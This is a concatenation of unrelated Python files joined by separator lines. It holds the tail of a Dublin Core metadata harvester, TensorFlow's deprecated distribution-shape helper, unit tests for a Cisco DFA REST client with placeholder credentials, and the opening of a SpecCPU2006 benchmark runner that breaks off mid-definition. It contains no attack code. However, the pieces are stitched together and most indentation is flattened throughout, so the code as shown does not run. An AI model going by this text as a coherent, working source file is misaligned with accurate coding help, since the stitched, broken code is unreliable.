if 'status' in record.find('./{*}header').attrib.keys():
if record.find('./{*}header').attrib['status'] == 'deleted':
continue
except AttributeError:
pass
oai_id = record.oai_urn
if VERBOSE:
print(oai_id)
logger.debug(oai_id)
sourceResource = {}
# sourceResource.alternative
# sourceResource.collection
if record.metadata.get_element('.//{0}source'.format(dc)):
sourceResource['collection'] = {'name': record.metadata.get_element('.//{0}source'.format(dc))[0]}
# sourceResource.contributor
if record.metadata.get_element('.//{0}contributor'.format(dc)):
sourceResource['contributor'] = [{"name": name}
for name in
record.metadata.get_element(
'.//{0}contributor'.format(dc),
delimiter=';')]
# sourceResource.creator
if record.metadata.get_element('.//{0}creator'.format(dc)):
sourceResource['creator'] = []
for name in record.metadata.get_element('.//{0}creator'.format(dc),
delimiter=';'):
                # need to test for ( Contributor ) and ( contributor );
                # note str.rstrip() strips a character set rather than a
                # suffix, so the marker is removed with a regex instead
                if (len(name) > 0) and ("ontributor )" not in name):
                    sourceResource['creator'].append({"name": name.strip(" ")})
                elif "ontributor )" in name:
                    if 'contributor' not in sourceResource.keys():
                        sourceResource['contributor'] = []
                    sourceResource['contributor'].append({"name": re.sub(
                        r'\s*\(\s*[Cc]ontributor\s*\)\s*$', '',
                        name.strip(" "))})
# sourceResource.date
date = record.metadata.get_element('.//{0}date.created'.format(dc))
if date:
sourceResource['date'] = {"begin": date[0], "end": date[0], "displayDate": date[0]}
# sourceResource.description
if record.metadata.get_element('.//{0}description.abstract'.format(dc)):
sourceResource['description'] = [clean_mark_up(desc) for desc in record.metadata.get_element(
'.//{0}description.abstract'.format(dc), delimiter=';')]
# sourceResource.extent
# sourceResource.format
if record.metadata.get_element('.//{0}format'.format(dc)):
sourceResource['format'] = record.metadata.get_element(
'.//{0}format'.format(dc))
# sourceResource.genre
# sourceResource.identifier
for identifier in record.metadata.get_element('.//{0}identifier'.format(dc)):
if 'http' in identifier:
is_shown_at = identifier
sourceResource['identifier'] = oai_id
# sourceResource.language
if record.metadata.get_element('.//{0}language'.format(dc)):
sourceResource['language'] = []
for lang in record.metadata.get_element('.//{0}language'.format(dc), delimiter=';'):
results = assets.iso639_2code(lang.split('-')[0])
sourceResource['language'].append(results)
# sourceResource.place : sourceResource['spatial']
if record.metadata.get_element('.//{0}coverage'.format(dc)):
sourceResource['spatial'] = [{'name': place}
for place in
record.metadata.get_element(
'.//{0}coverage'.format(dc))]
# sourceResource.publisher
if record.metadata.get_element('.//{0}publisher'.format(dc)):
sourceResource['publisher'] = record.metadata.get_element(
'.//{0}publisher'.format(dc))
# sourceResource.relation
# sourceResource.isReplacedBy
# sourceResource.replaces
# sourceResource.rights
rightsURI = re.compile('http://rightsstatements')
if record.metadata.get_element('.//{0}rights'.format(dc)):
for rights_statement in record.metadata.get_element(
'.//{0}rights'.format(dc)):
URI = rightsURI.search(rights_statement)
if URI:
URI_match = URI.string.split(" ")[-1]
sourceResource['rights'] = [{"@id": URI_match}]
else:
sourceResource['rights'] = [{"text": rights_statement}]
else:
logger.error('No sourceResource.rights - {0}'.format(oai_id))
continue
# sourceResource.subject
if record.metadata.get_element('.//{0}subject'.format(dc)):
sourceResource['subject'] = []
for term in record.metadata.get_element('.//{0}subject'.format(dc),
delimiter=';'):
                    term = re.sub(r"\( lcsh \)$", '', term)
if len(term) > 0:
sourceResource['subject'].append({"name": term.strip(". ")})
# sourceResource.title
title = record.metadata.get_element('.//{0}title'.format(dc))
if title:
sourceResource['title'] = title
else:
                logger.error('No sourceResource.title - {0}'.format(oai_id))
continue
# sourceResource.temporal
temporal = record.metadata.get_element('.//{0}coverage'.format(dc))
if temporal:
sourceResource['temporal'] = temporal
# sourceResource.type
if record.metadata.get_element('.//{0}type'.format(dc)):
if 'type' in sourceResource.keys():
sourceResource['type'] = sourceResource['type'] + record.metadata.get_element(
'.//{0}type'.format(dc))
else:
sourceResource['type'] = record.metadata.get_element(
'.//{0}type'.format(dc), delimiter=';')
if record.metadata.get_element('.//{0}format'.format(dc)):
if 'type' in sourceResource.keys():
sourceResource['type'] = sourceResource['type'] + record.metadata.get_element(
'.//{0}format'.format(dc))
else:
sourceResource['type'] = record.metadata.get_element(
'.//{0}format'.format(dc), delimiter=';')
# webResource.fileFormat
# aggregation.dataProvider
data_provider = dprovide
# aggregation.intermediateProvide
# aggregation.isShownAt
# aggregation.preview
preview = None
try:
preview = assets.thumbnail_service(record, tn)
except (TypeError, UnboundLocalError) as err:
logger.warning('aggregation.preview: {0} - {1}'.format(err, oai_id))
pass
# aggregation.provider
# build record
try:
if is_shown_at:
doc = assets.build(oai_id, sourceResource, data_provider, is_shown_at, preview, iprovide)
docs.append(doc)
except UnboundLocalError:
logger.error('No aggregation.isShownAt - {0}'.format(oai_id))
continue
return docs
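# A minimal usage sketch (hypothetical file path, thumbnail-service value and
# provider name; real values come from the harvest configuration):
# docs = FlaLD_DC('harvests/example_oai_dc.xml',
#                 tn='example-thumbnail-service',
#                 dprovide='Example Data Provider')
# for doc in docs:
#     print(doc)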
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A helper class for inferring Distribution shape."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.distributions import util as distribution_util
from tensorflow.python.util import deprecation
class _DistributionShape(object):
"""Manage and manipulate `Distribution` shape.
#### Terminology
Recall that a `Tensor` has:
- `shape`: size of `Tensor` dimensions,
- `ndims`: size of `shape`; number of `Tensor` dimensions,
- `dims`: indexes into `shape`; useful for transpose, reduce.
`Tensor`s sampled from a `Distribution` can be partitioned by `sample_dims`,
`batch_dims`, and `event_dims`. To understand the semantics of these
dimensions, consider when two of the three are fixed and the remaining
is varied:
- `sample_dims`: indexes independent draws from identical
parameterizations of the `Distribution`.
- `batch_dims`: indexes independent draws from non-identical
parameterizations of the `Distribution`.
- `event_dims`: indexes event coordinates from one sample.
The `sample`, `batch`, and `event` dimensions constitute the entirety of a
`Distribution` `Tensor`'s shape.
The dimensions are always in `sample`, `batch`, `event` order.
#### Purpose
This class partitions `Tensor` notions of `shape`, `ndims`, and `dims` into
`Distribution` notions of `sample,` `batch,` and `event` dimensions. That
is, it computes any of:
```
sample_shape batch_shape event_shape
sample_dims batch_dims event_dims
sample_ndims batch_ndims event_ndims
```
for a given `Tensor`, e.g., the result of
`Distribution.sample(sample_shape=...)`.
For a given `Tensor`, this class computes the above table using minimal
information: `batch_ndims` and `event_ndims`.
#### Examples
We show examples of distribution shape semantics.
- Sample dimensions:
Computing summary statistics, i.e., the average is a reduction over sample
dimensions.
```python
sample_dims = [0]
tf.reduce_mean(Normal(loc=1.3, scale=1.).sample_n(1000),
axis=sample_dims) # ~= 1.3
```
- Batch dimensions:
Monte Carlo estimation of a marginal probability:
Average over batch dimensions where batch dimensions are associated with
random draws from a prior.
E.g., suppose we want to find the Monte Carlo estimate of the marginal
distribution of a `Normal` with a random `Laplace` location:
```
P(X=x) = integral P(X=x|y) P(Y=y) dy
~= 1/n sum_{i=1}^n P(X=x|y_i), y_i ~iid Laplace(0,1)
= tf.reduce_mean(Normal(loc=Laplace(0., 1.).sample_n(n=1000),
scale=tf.ones(1000)).prob(x),
axis=batch_dims)
```
The `Laplace` distribution generates a `Tensor` of shape `[1000]`. When
fed to a `Normal`, this is interpreted as 1000 different locations, i.e.,
1000 non-identical Normals. Therefore a single call to `prob(x)` yields
1000 probabilities, one for every location. The average over this batch
yields the marginal.
- Event dimensions:
Computing the determinant of the Jacobian of a function of a random
variable involves a reduction over event dimensions.
E.g., Jacobian of the transform `Y = g(X) = exp(X)`:
```python
tf.compat.v1.div(1., tf.reduce_prod(x, event_dims))
```
We show examples using this class.
Write `S, B, E` for `sample_shape`, `batch_shape`, and `event_shape`.
```python
# 150 iid samples from one multivariate Normal with two degrees of freedom.
mu = [0., 0]
sigma = [[1., 0],
[0, 1]]
mvn = MultivariateNormal(mu, sigma)
rand_mvn = mvn.sample(sample_shape=[3, 50])
shaper = DistributionShape(batch_ndims=0, event_ndims=1)
S, B, E = shaper.get_shape(rand_mvn)
# S = [3, 50]
# B = []
# E = [2]
# 12 iid samples from one Wishart with 2x2 events.
sigma = [[1., 0],
[2, 1]]
wishart = Wishart(df=5, scale=sigma)
rand_wishart = wishart.sample(sample_shape=[3, 4])
shaper = DistributionShape(batch_ndims=0, event_ndims=2)
S, B, E = shaper.get_shape(rand_wishart)
# S = [3, 4]
# B = []
# E = [2, 2]
# 100 iid samples from two, non-identical trivariate Normal distributions.
mu = ... # shape(2, 3)
sigma = ... # shape(2, 3, 3)
  X = MultivariateNormal(mu, sigma).sample(sample_shape=[4, 25])
# S = [4, 25]
# B = [2]
# E = [3]
```
#### Argument Validation
  When `validate_args=True`, checks that cannot be done during
  graph construction are performed at graph execution. This may result in a
  performance degradation because data must be switched from GPU to CPU.
  For example, when `validate_args=True` and `event_ndims` is a
  non-constant `Tensor`, it is checked to be a non-negative integer at graph
  execution. (Same for `batch_ndims`). Constant `Tensor`s and non-`Tensor`
arguments are always checked for correctness since this can be done for
"free," i.e., during graph construction.
"""
@deprecation.deprecated(
"2018-10-01",
"The TensorFlow Distributions library has moved to "
"TensorFlow Probability "
"(https://github.com/tensorflow/probability). You "
"should update all references to use `tfp.distributions` "
"instead of `tf.contrib.distributions`.",
warn_once=True)
def __init__(self,
batch_ndims=None,
event_ndims=None,
validate_args=False,
name="DistributionShape"):
"""Construct `DistributionShape` with fixed `batch_ndims`, `event_ndims`.
`batch_ndims` and `event_ndims` are fixed throughout the lifetime of a
`Distribution`. They may only be known at graph execution.
If both `batch_ndims` and `event_ndims` are python scalars (rather than
either being a `Tensor`), functions in this class automatically perform
sanity checks during graph construction.
Args:
batch_ndims: `Tensor`. Number of `dims` (`rank`) of the batch portion of
indexes of a `Tensor`. A "batch" is a non-identical distribution, i.e,
Normal with different parameters.
event_ndims: `Tensor`. Number of `dims` (`rank`) of the event portion of
indexes of a `Tensor`. An "event" is what is sampled from a
distribution, i.e., a trivariate Normal has an event shape of [3] and a
4 dimensional Wishart has an event shape of [4, 4].
validate_args: Python `bool`, default `False`. When `True`,
non-`tf.constant` `Tensor` arguments are checked for correctness.
(`tf.constant` arguments are always checked.)
name: Python `str`. The name prepended to Ops created by this class.
Raises:
ValueError: if either `batch_ndims` or `event_ndims` are: `None`,
negative, not `int32`.
"""
if batch_ndims is None: raise ValueError("batch_ndims cannot be None")
if event_ndims is None: raise ValueError("event_ndims cannot be None")
self._batch_ndims = batch_ndims
self._event_ndims = event_ndims
self._validate_args = validate_args
with ops.name_scope(name):
self._name = name
with ops.name_scope("init"):
self._batch_ndims = self._assert_non_negative_int32_scalar(
ops.convert_to_tensor(
batch_ndims, name="batch_ndims"))
self._batch_ndims_static, self._batch_ndims_is_0 = (
self._introspect_ndims(self._batch_ndims))
self._event_ndims = self._assert_non_negative_int32_scalar(
ops.convert_to_tensor(
event_ndims, name="event_ndims"))
self._event_ndims_static, self._event_ndims_is_0 = (
self._introspect_ndims(self._event_ndims))
@property
def name(self):
"""Name given to ops created by this class."""
return self._name
@property
def batch_ndims(self):
"""Returns number of dimensions corresponding to non-identical draws."""
return self._batch_ndims
@property
def event_ndims(self):
"""Returns number of dimensions needed to index a sample's coordinates."""
return self._event_ndims
@property
def validate_args(self):
"""Returns True if graph-runtime `Tensor` checks are enabled."""
return self._validate_args
def get_ndims(self, x, name="get_ndims"):
"""Get `Tensor` number of dimensions (rank).
Args:
x: `Tensor`.
name: Python `str`. The name to give this op.
Returns:
ndims: Scalar number of dimensions associated with a `Tensor`.
"""
with self._name_scope(name, values=[x]):
x = ops.convert_to_tensor(x, name="x")
ndims = x.get_shape().ndims
if ndims is None:
return array_ops.rank(x, name="ndims")
return ops.convert_to_tensor(ndims, dtype=dtypes.int32, name="ndims")
def get_sample_ndims(self, x, name="get_sample_ndims"):
"""Returns number of dimensions corresponding to iid draws ("sample").
Args:
x: `Tensor`.
name: Python `str`. The name to give this op.
Returns:
sample_ndims: `Tensor` (0D, `int32`).
Raises:
ValueError: if `sample_ndims` is calculated to be negative.
"""
with self._name_scope(name, values=[x]):
ndims = self.get_ndims(x, name=name)
if self._is_all_constant_helper(ndims, self.batch_ndims,
self.event_ndims):
ndims = tensor_util.constant_value(ndims)
sample_ndims = (ndims - self._batch_ndims_static -
self._event_ndims_static)
if sample_ndims < 0:
raise ValueError(
"expected batch_ndims(%d) + event_ndims(%d) <= ndims(%d)" %
(self._batch_ndims_static, self._event_ndims_static, ndims))
return ops.convert_to_tensor(sample_ndims, name="sample_ndims")
else:
with ops.name_scope(name="sample_ndims"):
sample_ndims = ndims - self.batch_ndims - self.event_ndims
if self.validate_args:
sample_ndims = control_flow_ops.with_dependencies(
[check_ops.assert_non_negative(sample_ndims)], sample_ndims)
return sample_ndims
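  # Example: for x with shape [3, 50, 2], batch_ndims=0 and event_ndims=1,
  # get_sample_ndims(x) is 2 -- the leading [3, 50] dims index iid draws.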
def get_dims(self, x, name="get_dims"):
"""Returns dimensions indexing `sample_shape`, `batch_shape`, `event_shape`.
Example:
```python
x = ... # Tensor with shape [4, 3, 2, 1]
sample_dims, batch_dims, event_dims = _DistributionShape(
batch_ndims=2, event_ndims=1).get_dims(x)
# sample_dims == [0]
# batch_dims == [1, 2]
# event_dims == [3]
# Note that these are not the shape parts, but rather indexes into shape.
```
Args:
x: `Tensor`.
name: Python `str`. The name to give this op.
Returns:
sample_dims: `Tensor` (1D, `int32`).
batch_dims: `Tensor` (1D, `int32`).
event_dims: `Tensor` (1D, `int32`).
"""
with self._name_scope(name, values=[x]):
def make_dims(start_sum, size, name):
"""Closure to make dims range."""
start_sum = start_sum if start_sum else [
array_ops.zeros([], dtype=dtypes.int32, name="zero")]
if self._is_all_constant_helper(size, *start_sum):
start = sum(tensor_util.constant_value(s) for s in start_sum)
stop = start + tensor_util.constant_value(size)
return ops.convert_to_tensor(
list(range(start, stop)), dtype=dtypes.int32, name=name)
else:
start = sum(start_sum)
return math_ops.range(start, start + size)
sample_ndims = self.get_sample_ndims(x, name=name)
return (make_dims([], sample_ndims, name="sample_dims"),
make_dims([sample_ndims], self.batch_ndims, name="batch_dims"),
make_dims([sample_ndims, self.batch_ndims],
self.event_ndims, name="event_dims"))
def get_shape(self, x, name="get_shape"):
"""Returns `Tensor`'s shape partitioned into `sample`, `batch`, `event`.
Args:
x: `Tensor`.
name: Python `str`. The name to give this op.
Returns:
sample_shape: `Tensor` (1D, `int32`).
batch_shape: `Tensor` (1D, `int32`).
event_shape: `Tensor` (1D, `int32`).
"""
with self._name_scope(name, values=[x]):
x = ops.convert_to_tensor(x, name="x")
def slice_shape(start_sum, size, name):
"""Closure to slice out shape."""
start_sum = start_sum if start_sum else [
array_ops.zeros([], dtype=dtypes.int32, name="zero")]
if (x.get_shape().ndims is not None and
self._is_all_constant_helper(size, *start_sum)):
start = sum(tensor_util.constant_value(s) for s in start_sum)
stop = start + tensor_util.constant_value(size)
slice_ = x.get_shape()[start:stop].as_list()
if all(s is not None for s in slice_):
return ops.convert_to_tensor(slice_, dtype=dtypes.int32, name=name)
return array_ops.slice(array_ops.shape(x), [sum(start_sum)], [size])
sample_ndims = self.get_sample_ndims(x, name=name)
return (slice_shape([], sample_ndims,
name="sample_shape"),
slice_shape([sample_ndims], self.batch_ndims,
name="batch_shape"),
slice_shape([sample_ndims, self.batch_ndims], self.event_ndims,
name="event_shape"))
  # TODO(jvdillon): Make expand_batch_dim=False the default behavior, then
  # remove the expand_batch_dim argument.
def make_batch_of_event_sample_matrices(
self, x, expand_batch_dim=True,
name="make_batch_of_event_sample_matrices"):
"""Reshapes/transposes `Distribution` `Tensor` from S+B+E to B_+E_+S_.
Where:
- `B_ = B if B or not expand_batch_dim else [1]`,
- `E_ = E if E else [1]`,
- `S_ = [tf.reduce_prod(S)]`.
Args:
x: `Tensor`.
expand_batch_dim: Python `bool`. If `True` the batch dims will be expanded
such that `batch_ndims >= 1`.
name: Python `str`. The name to give this op.
Returns:
x: `Tensor`. Input transposed/reshaped to `B_+E_+S_`.
sample_shape: `Tensor` (1D, `int32`).
"""
with self._name_scope(name, values=[x]):
x = ops.convert_to_tensor(x, name="x")
# x.shape: S+B+E
sample_shape, batch_shape, event_shape = self.get_shape(x)
event_shape = distribution_util.pick_vector(
self._event_ndims_is_0, [1], event_shape)
if expand_batch_dim:
batch_shape = distribution_util.pick_vector(
self._batch_ndims_is_0, [1], batch_shape)
new_shape = array_ops.concat([[-1], batch_shape, event_shape], 0)
x = array_ops.reshape(x, shape=new_shape)
# x.shape: [prod(S)]+B_+E_
x = distribution_util.rotate_transpose(x, shift=-1)
# x.shape: B_+E_+[prod(S)]
return x, sample_shape
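  # Shape walk-through (assuming batch_ndims=1, event_ndims=1 and
  # x.shape == [1000, 2, 3], i.e. S=[1000], B=[2], E=[3]): the reshape
  # yields [prod(S)]+B_+E_ = [1000, 2, 3], and rotate_transpose then moves
  # the sample axis to the back, giving B_+E_+S_ = [2, 3, 1000].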
  # TODO(jvdillon): Make expand_batch_dim=False the default behavior, then
  # remove the expand_batch_dim argument.
def undo_make_batch_of_event_sample_matrices(
self, x, sample_shape, expand_batch_dim=True,
name="undo_make_batch_of_event_sample_matrices"):
"""Reshapes/transposes `Distribution` `Tensor` from B_+E_+S_ to S+B+E.
Where:
- `B_ = B if B or not expand_batch_dim else [1]`,
- `E_ = E if E else [1]`,
- `S_ = [tf.reduce_prod(S)]`.
This function "reverses" `make_batch_of_event_sample_matrices`.
Args:
x: `Tensor` of shape `B_+E_+S_`.
sample_shape: `Tensor` (1D, `int32`).
expand_batch_dim: Python `bool`. If `True` the batch dims will be expanded
such that `batch_ndims>=1`.
name: Python `str`. The name to give this op.
Returns:
x: `Tensor`. Input transposed/reshaped to `S+B+E`.
"""
with self._name_scope(name, values=[x, sample_shape]):
x = ops.convert_to_tensor(x, name="x")
      # x.shape: B_+E_+[prod(S)]
      sample_shape = ops.convert_to_tensor(sample_shape, name="sample_shape")
      x = distribution_util.rotate_transpose(x, shift=1)
      # x.shape: [prod(S)]+B_+E_
if self._is_all_constant_helper(self.batch_ndims, self.event_ndims):
if self._batch_ndims_is_0 or self._event_ndims_is_0:
squeeze_dims = []
if self._event_ndims_is_0:
squeeze_dims += [-1]
if self._batch_ndims_is_0 and expand_batch_dim:
squeeze_dims += [1]
if squeeze_dims:
x = array_ops.squeeze(x, axis=squeeze_dims)
# x.shape: [prod(S)]+B+E
_, batch_shape, event_shape = self.get_shape(x)
else:
s = (x.get_shape().as_list() if x.get_shape().is_fully_defined()
else array_ops.shape(x))
batch_shape = s[1:1+self.batch_ndims]
        # Since there is a single, left-most sample dim, we add 1 to the
        # number of batch_ndims to get the event start dim.
event_start = array_ops.where_v2(
math_ops.logical_and(expand_batch_dim, self._batch_ndims_is_0), 2,
1 + self.batch_ndims)
event_shape = s[event_start:event_start+self.event_ndims]
new_shape = array_ops.concat([sample_shape, batch_shape, event_shape], 0)
x = array_ops.reshape(x, shape=new_shape)
# x.shape: S+B+E
return x
@contextlib.contextmanager
def _name_scope(self, name=None, values=None):
"""Helper function to standardize op scope."""
with ops.name_scope(self.name):
with ops.name_scope(name, values=(
(values or []) + [self.batch_ndims, self.event_ndims])) as scope:
yield scope
def _is_all_constant_helper(self, *args):
"""Helper which returns True if all inputs are constant_value."""
return all(tensor_util.constant_value(x) is not None for x in args)
def _assert_non_negative_int32_scalar(self, x):
"""Helper which ensures that input is a non-negative, int32, scalar."""
x = ops.convert_to_tensor(x, name="x")
if x.dtype.base_dtype != dtypes.int32.base_dtype:
raise TypeError("%s.dtype=%s is not %s" % (x.name, x.dtype, dtypes.int32))
x_value_static = tensor_util.constant_value(x)
if x.get_shape().ndims is not None and x_value_static is not None:
if x.get_shape().ndims != 0:
raise ValueError("%s.ndims=%d is not 0 (scalar)" %
(x.name, x.get_shape().ndims))
if x_value_static < 0:
raise ValueError("%s.value=%d cannot be negative" %
(x.name, x_value_static))
return x
if self.validate_args:
x = control_flow_ops.with_dependencies([
check_ops.assert_rank(x, 0),
check_ops.assert_non_negative(x)], x)
return x
def _introspect_ndims(self, ndims):
"""Helper to establish some properties of input ndims args."""
if self._is_all_constant_helper(ndims):
return (tensor_util.constant_value(ndims),
tensor_util.constant_value(ndims) == 0)
return None, math_ops.equal(ndims, 0)
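# A minimal usage sketch (assumes graph-mode TF 1.x and a Tensor `x` sampled
# with shape S+B+E, e.g. [1000, 2, 3]):
# shaper = _DistributionShape(batch_ndims=1, event_ndims=1)
# sample_shape, batch_shape, event_shape = shaper.get_shape(x)
# y, s = shaper.make_batch_of_event_sample_matrices(x)  # shape B_+E_+S_
# x_round_trip = shaper.undo_make_batch_of_event_sample_matrices(y, s)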
|
|
# Copyright 2015 Cisco Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import mock
from oslo_config import cfg
from oslotest import base
from networking_cisco.apps.saf.common import config
from networking_cisco.apps.saf.server import cisco_dfa_rest as dc
"""This file includes test cases for cisco_dfa_rest.py."""
FAKE_DCNM_IP = '1.1.1.1'
FAKE_DCNM_USERNAME = 'dcnmuser'
FAKE_DCNM_PASSWD = 'dcnmpass'
class TestNetwork(object):
segmentation_id = 123456
name = 'cisco_test_network'
config_profile = 'defaultL2ConfigProfile'
class TestCiscoDFAClient(base.BaseTestCase):
"""Test cases for DFARESTClient."""
def setUp(self):
# Declare the test resource.
super(TestCiscoDFAClient, self).setUp()
# Setting DCNM parameters.
cfg.CONF.set_override('dcnm_ip', FAKE_DCNM_IP, group='dcnm')
cfg.CONF.set_override('dcnm_user', FAKE_DCNM_USERNAME, group='dcnm')
cfg.CONF.set_override('dcnm_password', FAKE_DCNM_PASSWD, group='dcnm')
cfg.CONF.set_override('timeout_resp', 0.01, group='dcnm')
self.cfg = config.CiscoDFAConfig().cfg
self.send_req = mock.patch.object(dc.DFARESTClient,
'_send_request').start()
self.get_vers = mock.patch.object(dc.DFARESTClient,
'get_version').start()
self.login = mock.patch.object(dc.DFARESTClient,
'_login_request').start()
self.logout = mock.patch.object(dc.DFARESTClient,
'_logout_request').start()
self.send_req.return_value = mock.Mock()
self.send_req.return_value.status_code = 200
self.send_req.return_value.json.return_value = {}
self.get_vers.return_value = '7.0(1)'
self.dcnm_client = dc.DFARESTClient(self.cfg)
self.testnetwork = TestNetwork()
def test_create_project(self):
"""Test create project."""
self.send_req.reset_mock()
org_name = 'Cisco'
part_name = self.dcnm_client._part_name
dci = 100
orch_id = 'OpenStack Controller'
self.dcnm_client.create_project(orch_id, org_name, part_name, dci)
call_cnt = self.dcnm_client._send_request.call_count
self.assertEqual(2, call_cnt)
# Check call to partition and organization happens.
org_pyld = {
'organizationName': org_name,
'description': org_name,
'orchestrationSource': "OpenStack Controller"}
part_pyld = {
'partitionName': part_name,
'organizationName': org_name,
'description': org_name,
'serviceNodeIpAddress': None}
org_url = self.dcnm_client._org_url
part_url = self.dcnm_client._create_part_url % org_name
expected_calls = [mock.call('POST', org_url, org_pyld, 'organization'),
mock.call('POST', part_url, part_pyld, 'partition')]
self.assertEqual(expected_calls,
self.dcnm_client._send_request.call_args_list)
def test_create_network(self):
"""Test create network."""
network_info = {}
cfg_args = []
seg_id = str(self.testnetwork.segmentation_id)
config_profile = self.testnetwork.config_profile
network_name = self.testnetwork.name
tenant_name = 'Cisco'
part_name = self.dcnm_client._part_name
url = self.dcnm_client._create_network_url % (tenant_name, part_name)
cfg_args.append("$segmentId=" + seg_id)
cfg_args.append("$netMaskLength=16")
cfg_args.append("$gatewayIpAddress=30.31.32.1")
cfg_args.append("$networkName=" + network_name)
cfg_args.append("$vlanId=0")
cfg_args.append("$vrfName=%s:%s" % (tenant_name, part_name))
cfg_args = ';'.join(cfg_args)
dhcp_scopes = {'ipRange': '10.11.12.14-10.11.12.254',
'subnet': '10.11.12.13',
'gateway': '10.11.12.1'}
network_info = {"segmentId": seg_id,
"vlanId": "0",
"mobilityDomainId": "None",
"profileName": config_profile,
"networkName": network_name,
"configArg": cfg_args,
"organizationName": tenant_name,
"partitionName": part_name,
"description": network_name,
"dhcpScope": dhcp_scopes}
self.dcnm_client._create_network(network_info)
self.dcnm_client._send_request.assert_called_with('POST', url,
network_info,
'network')
def test_delete_network(self):
"""Test delete network."""
seg_id = self.testnetwork.segmentation_id
tenant_name = 'cisco'
part_name = self.dcnm_client._part_name
url = self.dcnm_client._network_url % (tenant_name, part_name, seg_id)
self.dcnm_client.delete_network(tenant_name, self.testnetwork)
self.dcnm_client._send_request.assert_called_with('DELETE', url,
'', 'network')
def test_delete_project(self):
"""Test delete tenant."""
self.send_req.reset_mock()
tenant_name = 'cisco'
part_name = self.dcnm_client._part_name
self.dcnm_client.delete_project(tenant_name, part_name)
call_cnt = self.dcnm_client._send_request.call_count
self.assertEqual(2, call_cnt)
# Check the calls to delete partition and org happens.
del_org_url = self.dcnm_client._del_org_url % tenant_name
del_part_url = self.dcnm_client._del_part % (tenant_name, part_name)
expected_calls = [mock.call('DELETE', del_part_url, '', 'partition'),
mock.call('DELETE', del_org_url, '', 'organization')]
self.assertEqual(expected_calls,
self.dcnm_client._send_request.call_args_list)
def test_http_verify_protocol(self):
"""Test login test using http. """
self.login.reset_mock()
self.logout.reset_mock()
self.dcnm_client._verify_protocol('http')
test_login_url = 'http://' + FAKE_DCNM_IP + '/rest/logon'
test_logout_url = 'http://' + FAKE_DCNM_IP + '/rest/logout'
self.login.assert_called_with(test_login_url)
self.logout.assert_called_with(test_logout_url)
def test_https_verify_protocol(self):
"""Test login test using https. """
self.login.reset_mock()
self.logout.reset_mock()
self.dcnm_client._verify_protocol('https')
test_login_url = 'https://' + FAKE_DCNM_IP + '/rest/logon'
test_logout_url = 'https://' + FAKE_DCNM_IP + '/rest/logout'
self.login.assert_called_with(test_login_url)
self.logout.assert_called_with(test_logout_url)
def test_get_segmentid_range(self):
"""Test get segment ID range."""
self.send_req.reset_mock()
orch_id = 'OpenStack_Controller'
self.dcnm_client.get_segmentid_range(orch_id)
segment_range_url = self.dcnm_client._segmentid_ranges_url + '/' + (
orch_id)
expected_calls = [mock.call('GET', segment_range_url, None,
'segment-id range')]
self.assertEqual(expected_calls,
self.dcnm_client._send_request.call_args_list)
def test_set_segmentid_range(self):
"""Test set segment ID range."""
self.send_req.reset_mock()
orch_id = 'OpenStack_Controller'
segid_min = 10000
segid_max = 12000
self.dcnm_client.set_segmentid_range(orch_id, segid_min, segid_max)
segment_range_url = self.dcnm_client._segmentid_ranges_url
payload = {'orchestratorId': orch_id,
'segmentIdRanges': "%s-%s" % (segid_min, segid_max)}
expected_calls = [mock.call('POST', segment_range_url, payload,
'segment-id range')]
self.assertEqual(expected_calls,
self.dcnm_client._send_request.call_args_list)
def test_update_segmentid_range(self):
"""Test set segment ID range."""
self.send_req.reset_mock()
orch_id = 'OpenStack_Controller'
segid_min = 10000
segid_max = 12000
self.dcnm_client.update_segmentid_range(orch_id, segid_min, segid_max)
segment_range_url = self.dcnm_client._segmentid_ranges_url + '/' + (
orch_id)
payload = {'orchestratorId': orch_id,
'segmentIdRanges': "%s-%s" % (segid_min, segid_max)}
expected_calls = [mock.call('PUT', segment_range_url, payload,
'segment-id range')]
self.assertEqual(expected_calls,
self.dcnm_client._send_request.call_args_list)
|
|
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Runs SpecCPU2006.
From SpecCPU2006's documentation:
The SPEC CPU2006 benchmark is SPEC's industry-standardized, CPU-intensive
benchmark suite, stressing a system's processor, memory subsystem and compiler.
SpecCPU2006 homepage: http://www.spec.org/cpu2006/
"""
import logging
import os
import re
from perfkitbenchmarker import data
from perfkitbenchmarker import errors
from perfkitbenchmarker import flags
from perfkitbenchmarker import sample
FLAGS = flags.FLAGS
flags.DEFINE_enum('benchmark_subset', 'int', ['int', 'fp', 'all'],
'specify a subset of benchmarks to run: int, fp, all')
flags.DEFINE_string('runspec_config', 'linux64-x64-gcc47.cfg',
'name of the cpu2006 configuration to use (runspec --config'
' argument)')
flags.DEFINE_integer('runspec_iterations', 3,
'number of benchmark iterations to execute - default 3 '
'(runspec --iterations argument)')
flags.DEFINE_string('runspec_define', '',
'optional comma separated list of preprocessor macros: '
'SYMBOL[=VALUE] - e.g. numa,smt,sse=SSE4.2 (runspec '
'--define arguments)')
flags.DEFINE_boolean('runspec_enable_32bit', default=False,
help='setting this flag will result in installation of '
'multilib packages to enable use of 32-bit cpu2006 '
